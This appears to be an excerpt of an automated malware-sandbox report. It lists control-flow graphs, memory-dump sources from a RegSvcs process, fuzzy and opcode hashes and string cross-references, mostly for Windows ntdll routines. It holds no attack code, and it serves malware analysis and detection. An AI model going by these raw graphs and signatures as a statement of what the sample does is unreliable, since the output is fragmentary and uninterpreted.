                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1284e8d9baa0d80b8643947f379561947c3df799f09bea5bc974c85c6469146e
                                                                                                              • Instruction ID: 705e7366df75f50f2d7a36b20794f5037f585fcb3c36eacfb974ea3f93f3414b
                                                                                                              • Opcode Fuzzy Hash: 1284e8d9baa0d80b8643947f379561947c3df799f09bea5bc974c85c6469146e
                                                                                                              • Instruction Fuzzy Hash: 9CE08072B5023477C530654B6C05F57775DCBC1F60F460016FE0897341D568AD0042E9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 57 42ed53-42ed63 58 42ed69-42ed6d 57->58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a74412573010063ad30df8e7c3dbac44f91774c43dafe5ce498322a5524ddc43
                                                                                                              • Instruction ID: 2c6511041599095c994ba1a69533891cabf7770030d69c3aa955075a383ab384
                                                                                                              • Opcode Fuzzy Hash: a74412573010063ad30df8e7c3dbac44f91774c43dafe5ce498322a5524ddc43
                                                                                                              • Instruction Fuzzy Hash: A3C08CB2A003087FDB00EE8DDC46F66339C9B08614F804049BA0C8B392E970FD5087A8

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 59 42ed50-42ed63 60 42ed69-42ed6d 59->60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6c78421f402c534d88d217095400eba8be619e0293668384ebcb3ef3bbbb603
                                                                                                              • Instruction ID: 18bbd9d0cd47f21f9b99e8bc6db3e812f0df4dbdb20a7c098c3edfdaaa88f3d9
                                                                                                              • Opcode Fuzzy Hash: e6c78421f402c534d88d217095400eba8be619e0293668384ebcb3ef3bbbb603
                                                                                                              • Instruction Fuzzy Hash: D9C080F19001142EE784BF51EC4AF9137188F45714F44018DF46D0F552D5167952C744

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 61 eca250-eca26f 62 eca58d-eca594 61->62 63 eca275-eca291 61->63 62->63 66 eca59a-f179bb 62->66 64 f179e6-f179eb 63->64 65 eca297-eca2a0 63->65 65->64 67 eca2a6-eca2ac 65->67 66->63 71 f179c1-f179c6 66->71 69 eca6ba-eca6bc 67->69 70 eca2b2-eca2b4 67->70 72 eca2ba-eca2bd 69->72 73 eca6c2 69->73 70->64 70->72 74 eca473-eca479 71->74 72->64 75 eca2c3-eca2c6 72->75 73->75 76 eca2c8-eca2d1 75->76 77 eca2da-eca2dd 75->77 78 f179cb-f179d5 76->78 79 eca2d7 76->79 80 eca6c7-eca6d0 77->80 81 eca2e3-eca32b 77->81 83 f179da-f179e3 call f3f290 78->83 79->77 80->81 82 eca6d6-f179ff 80->82 84 eca330-eca335 81->84 82->83 83->64 87 eca47c-eca47f 84->87 88 eca33b-eca343 84->88 89 eca34f-eca35d 87->89 90 eca485-eca488 87->90 88->89 92 eca345-eca349 88->92 94 eca48e-eca49e 89->94 95 eca363-eca368 89->95 90->94 96 f17a16-f17a19 90->96 92->89 93 eca59f-eca5a8 92->93 100 eca5aa-eca5ac 93->100 101 eca5c0-eca5c3 93->101 94->96 99 eca4a4-eca4ad 94->99 97 eca36c-eca36e 95->97 96->97 98 f17a1f-f17a24 96->98 105 f17a26 97->105 106 eca374-eca38c call eca6e0 97->106 107 f17a2b 98->107 99->97 100->89 102 eca5b2-eca5bb 100->102 103 f17a01 101->103 104 eca5c9-eca5cc 101->104 102->97 108 f17a0c 103->108 104->108 109 eca5d2-eca5d5 104->109 105->107 114 eca4b2-eca4b9 106->114 115 eca392-eca3ba 106->115 111 f17a2d-f17a2f 107->111 108->96 109->100 111->74 113 f17a35 111->113 116 eca3bc-eca3be 114->116 117 eca4bf-eca4c2 114->117 115->116 116->111 118 eca3c4-eca3cb 116->118 117->116 119 eca4c8-eca4d3 117->119 120 f17ae0 118->120 121 eca3d1-eca3d4 118->121 119->84 123 f17ae4-f17afc call f3f290 120->123 122 eca3e0-eca3ea 121->122 122->123 125 eca3f0-eca40c call eca840 122->125 123->74 129 eca5d7-eca5e0 125->129 130 eca412-eca417 125->130 131 eca601-eca603 129->131 132 eca5e2-eca5eb 129->132 130->74 133 eca419-eca43d 130->133 136 eca629-eca631 131->136 137 eca605-eca623 call eb4508 131->137 132->131 135 eca5ed-eca5f1 132->135 134 eca440-eca443 133->134 138 eca4d8-eca4dc 134->138 139 eca449-eca44c 134->139 140 eca5f7-eca5fb 135->140 141 eca681-eca6ab RtlDebugPrintTimes 135->141 137->74 137->136 146 f17a3a-f17a42 138->146 147 eca4e2-eca4e5 138->147 143 f17ad6 139->143 144 eca452-eca454 139->144 140->131 140->141 141->131 158 eca6b1-eca6b5 141->158 143->120 150 eca45a-eca461 144->150 151 eca520-eca539 call eca6e0 144->151 149 eca634-eca64a 146->149 153 f17a48-f17a4c 146->153 148 eca4eb-eca4ee 147->148 147->149 148->139 154 eca4f4-eca50c 148->154 149->154 159 eca650-eca659 149->159 155 eca57b-eca582 150->155 156 eca467-eca46c 150->156 169 eca65e-eca665 151->169 170 eca53f-eca567 151->170 153->149 160 f17a52-f17a5b 153->160 154->139 161 eca512-eca51b 154->161 155->122 164 eca588 155->164 156->74 162 eca46e 156->162 158->131 159->144 165 f17a85-f17a87 160->165 166 f17a5d-f17a60 160->166 161->144 162->74 164->120 165->149 171 f17a8d-f17a96 165->171 167 f17a62-f17a6c 166->167 168 f17a6e-f17a71 166->168 174 f17a81 167->174 175 f17a73-f17a7c 168->175 176 f17a7e 168->176 172 eca569-eca56b 169->172 173 eca66b-eca66e 169->173 170->172 171->144 172->156 178 eca571-eca573 172->178 173->172 177 eca674-eca67c 173->177 174->165 175->171 176->174 177->134 179 eca579 178->179 180 f17a9b-f17aa4 178->180 179->155 180->179 181 f17aaa-f17ab0 180->181 181->179 182 f17ab6-f17abe 181->182 182->179 183 f17ac4-f17acf 182->183 183->182 184 f17ad1 183->184 184->179
                                                                                                              Strings
                                                                                                              • SsHd, xrefs: 00ECA3E4
                                                                                                              • PR, xrefs: 00F17A73
                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00F179FA
                                                                                                              • PR, xrefs: 00F17A0C
                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 00F179D0, 00F179F5
                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00F179D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: PR$PR$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                              • API String ID: 0-2516949602
                                                                                                              • Opcode ID: 7e35c5d8d72fda6e1eabd9dabb183146607abd01cea88f154d921ff0ce97e40b
                                                                                                              • Instruction ID: 98d12e5b7c0d392afc6ae8109e3c393d2164290ad4d35803c7e2d74233bdb757
                                                                                                              • Opcode Fuzzy Hash: 7e35c5d8d72fda6e1eabd9dabb183146607abd01cea88f154d921ff0ce97e40b
                                                                                                              • Instruction Fuzzy Hash: B9E1C3716083058FD724CE28C594F6AB7E1BB8432CF18563DE8A5EB290D736DD86D782

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 185 ef2890-ef28b3 186 ef28b9-ef28cc 185->186 187 f2a4bc-f2a4c0 185->187 189 ef28ce-ef28d7 186->189 190 ef28dd-ef28df 186->190 187->186 188 f2a4c6-f2a4ca 187->188 188->186 191 f2a4d0-f2a4d4 188->191 189->190 192 f2a57e-f2a585 189->192 193 ef28e1-ef28e5 190->193 191->186 196 f2a4da-f2a4de 191->196 192->190 194 ef28eb-ef28fa 193->194 195 ef2988-ef298e 193->195 197 f2a58a-f2a58d 194->197 198 ef2900-ef2905 194->198 199 ef2908-ef290c 195->199 196->186 200 f2a4e4-f2a4eb 196->200 197->199 198->199 199->193 201 ef290e-ef291b 199->201 202 f2a564-f2a56c 200->202 203 f2a4ed-f2a4f4 200->203 204 f2a592-f2a599 201->204 205 ef2921 201->205 202->186 206 f2a572-f2a576 202->206 207 f2a4f6-f2a4fe 203->207 208 f2a50b 203->208 217 f2a5a1-f2a5c9 call f00050 204->217 210 ef2924-ef2926 205->210 206->186 211 f2a57c call f00050 206->211 207->186 212 f2a504-f2a509 207->212 209 f2a510-f2a536 call f00050 208->209 225 f2a55d-f2a55f 209->225 214 ef2928-ef292a 210->214 215 ef2993-ef2995 210->215 211->225 212->209 221 ef292c-ef292e 214->221 222 ef2946-ef2966 call f00050 214->222 215->214 219 ef2997-ef29b1 call f00050 215->219 234 ef2969-ef2974 219->234 221->222 228 ef2930-ef2944 call f00050 221->228 222->234 231 ef2981-ef2985 225->231 228->222 234->210 236 ef2976-ef2979 234->236 236->217 237 ef297f 236->237 237->231
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: `7
                                                                                                              • API String ID: 48624451-1189063315
                                                                                                              • Opcode ID: 9a66533acdb2815082f5a579f4e8a783a35a77b5b0d2b2e0dee3c02ebe4e815d
                                                                                                              • Instruction ID: d523337620a752ec4cdcbc389154dc484e9cbb65ec1511b9cbfb537816a243e9
                                                                                                              • Opcode Fuzzy Hash: 9a66533acdb2815082f5a579f4e8a783a35a77b5b0d2b2e0dee3c02ebe4e815d
                                                                                                              • Instruction Fuzzy Hash: 9D5109B6A0025ABFCB14DFA88C8097FF7B8BB48340B54916DE669E7641D774DE0097E0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 657 ecd770-ecd7ab 658 ecd9e7-ecd9ee 657->658 659 ecd7b1-ecd7bb 657->659 658->659 660 ecd9f4-f1932c 658->660 661 f19357 659->661 662 ecd7c1-ecd7ca 659->662 660->659 667 f19332-f19337 660->667 668 f19361-f19370 661->668 662->661 663 ecd7d0-ecd7d3 662->663 665 ecd7d9-ecd7db 663->665 666 ecd9da-ecd9dc 663->666 665->661 669 ecd7e1-ecd7e4 665->669 666->669 671 ecd9e2 666->671 670 ecd927-ecd938 call ef4c30 667->670 672 f1934b-f19354 call f3f290 668->672 669->661 673 ecd7ea-ecd7ed 669->673 671->673 672->661 676 ecd9f9-ecda02 673->676 677 ecd7f3-ecd7f6 673->677 676->677 682 ecda08-f19346 676->682 680 ecd7fc-ecd848 call ecd660 677->680 681 ecda0d-ecda16 677->681 680->670 687 ecd84e-ecd852 680->687 681->680 685 ecda1c 681->685 682->672 685->668 687->670 688 ecd858-ecd85f 687->688 689 ecd865-ecd869 688->689 690 ecd9d1-ecd9d5 688->690 692 ecd870-ecd87a 689->692 691 f19563-f1957b call f3f290 690->691 691->670 692->691 693 ecd880-ecd887 692->693 696 ecd8ed-ecd90d 693->696 697 ecd889-ecd88d 693->697 698 ecd910-ecd913 696->698 699 f19372 697->699 700 ecd893-ecd898 697->700 701 ecd93b-ecd940 698->701 702 ecd915-ecd918 698->702 704 f19379-f1937b 699->704 703 ecd89e-ecd8a5 700->703 700->704 709 f194d3-f194db 701->709 710 ecd946-ecd949 701->710 707 ecd91e-ecd920 702->707 708 f19559-f1955e 702->708 705 ecd8ab-ecd8e3 call ef8250 703->705 706 f193ea-f193ed 703->706 704->703 711 f19381-f193aa 704->711 731 ecd8e5-ecd8e7 705->731 713 f193f1-f19400 call f082c0 706->713 714 ecd971-ecd98c call eca6e0 707->714 715 ecd922 707->715 708->670 716 f194e1-f194e5 709->716 717 ecda21-ecda2f 709->717 710->717 718 ecd94f-ecd952 710->718 711->696 719 f193b0-f193ca call f082c0 711->719 741 f19402-f19410 713->741 742 f19417 713->742 738 f19528-f1952d 714->738 739 ecd992-ecd9ba 714->739 715->670 716->717 726 f194eb-f194f4 716->726 721 ecd954-ecd964 717->721 722 ecda35-ecda3e 717->722 718->702 718->721 719->731 736 f193d0-f193e3 719->736 721->702 727 ecd966-ecd96f 721->727 722->707 728 f19512-f19514 726->728 729 f194f6-f194f9 726->729 727->707 728->717 740 f1951a-f19523 728->740 734 f19503-f19506 729->734 735 f194fb-f19501 729->735 731->696 737 f19420-f19424 731->737 743 f19508-f1950d 734->743 744 f1950f 734->744 735->728 736->719 745 f193e5 736->745 737->696 749 f1942a-f19430 737->749 746 ecd9bc-ecd9be 738->746 747 f19533-f19536 738->747 739->746 740->707 741->713 748 f19412 741->748 742->737 743->740 744->728 745->696 750 f19549-f1954e 746->750 751 ecd9c4-ecd9cb 746->751 747->746 752 f1953c-f19544 747->752 748->696 753 f19432-f1944f 749->753 754 f19457-f19460 749->754 750->670 757 f19554 750->757 751->690 751->692 752->698 753->754 758 f19451-f19454 753->758 755 f19462-f19467 754->755 756 f194a7-f194a9 754->756 755->756 759 f19469-f1946d 755->759 760 f194ab-f194c6 call eb4508 756->760 761 f194cc-f194ce 756->761 757->708 758->754 762 f19475-f194a1 RtlDebugPrintTimes 759->762 763 f1946f-f19473 759->763 760->670 760->761 761->670 762->756 767 f194a3 762->767 763->756 763->762 767->756
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • PR, xrefs: 00F19508
                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00F1936B
                                                                                                              • GsHd, xrefs: 00ECD874
                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 00F19341, 00F19366
                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00F19346
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: GsHd$PR$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                              • API String ID: 3446177414-2462212343
                                                                                                              • Opcode ID: 5c7d784fbe73460759d4faa88c0714658b2108298f435092e06ba6fd202276b2
                                                                                                              • Instruction ID: ac10b99c784341f2825d3074cd0f312b381b16c843fb706ea9735c405d963a94
                                                                                                              • Opcode Fuzzy Hash: 5c7d784fbe73460759d4faa88c0714658b2108298f435092e06ba6fd202276b2
                                                                                                              • Instruction Fuzzy Hash: 5FE1A37560C3018FDB14CF14C990BAAB7E5BF88318F14593DF895AB281D7B2D986DB82
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                              • Instruction ID: 6ca888f3e1e92c61a7f066a11b287a4cfe50428dd74d2781bf38d47177cbbaa2
                                                                                                              • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                              • Instruction Fuzzy Hash: DA81D270E0528D8EDF289E68C8517FEBBB6AF85354F28625AEA51B72D1C7348C40CB50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 3446177414-1194432280
                                                                                                              • Opcode ID: 9ab1853bccd95d168e3ea04efea6e36ce17f72e13fc8c827ba6535b74d458d5b
                                                                                                              • Instruction ID: c45d344d716ff75f477e1d8b522dbf4a6615feb7d9abc74e7ceb6901d25361cb
                                                                                                              • Opcode Fuzzy Hash: 9ab1853bccd95d168e3ea04efea6e36ce17f72e13fc8c827ba6535b74d458d5b
                                                                                                              • Instruction Fuzzy Hash: 7B813B71D012699BDB35CB94CD45BEEB7B4AF08710F0441EAEA19B7291E7309E81DFA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                              • API String ID: 3446177414-56086060
                                                                                                              • Opcode ID: e9d274ef3c160c07d5c2bec6d5979188117031ce7378c2e1441491f33f1aebf1
                                                                                                              • Instruction ID: ff7521c2f57c560008b0bbb122c4a6e6f2a4e133c640bdef4dd614f1557fd95f
                                                                                                              • Opcode Fuzzy Hash: e9d274ef3c160c07d5c2bec6d5979188117031ce7378c2e1441491f33f1aebf1
                                                                                                              • Instruction Fuzzy Hash: 45414271A04740DFC711DB24C885BAAB7E0EF45338F24806AE4466B3A2CB78ACC5D790
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 00F34899
                                                                                                              • LdrpCheckRedirection, xrefs: 00F3488F
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00F34888
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 3446177414-3154609507
                                                                                                              • Opcode ID: bbb97fa1c6872ad794a4c2847dd121d825a6f52aaeaaf3c9a864960709c6f5c8
                                                                                                              • Instruction ID: 688b8281938e8a822a413e2b73f6313b60ee91d8cd90de8253b27b2ecbae9e13
                                                                                                              • Opcode Fuzzy Hash: bbb97fa1c6872ad794a4c2847dd121d825a6f52aaeaaf3c9a864960709c6f5c8
                                                                                                              • Instruction Fuzzy Hash: C4418F72A147519FCB21CF68D840A26BBE5AF4AB70F150669EC99E7361D730FC00EB91
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: $$`
                                                                                                              • API String ID: 3446177414-2005972857
                                                                                                              • Opcode ID: b095f992c4f636fbc5acde1823dbed4e46fdf08463e273b418cc7179528d2d0d
                                                                                                              • Instruction ID: 3fbe63e9e0eada36b29cb5134ddaa195ee2b177892ded8ec62ec26418e80b0b2
                                                                                                              • Opcode Fuzzy Hash: b095f992c4f636fbc5acde1823dbed4e46fdf08463e273b418cc7179528d2d0d
                                                                                                              • Instruction Fuzzy Hash: 9D41BFB5E00619ABCF11DF99E880AEEBBB5FF48314F150139E900A7361C7709D15EB90
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
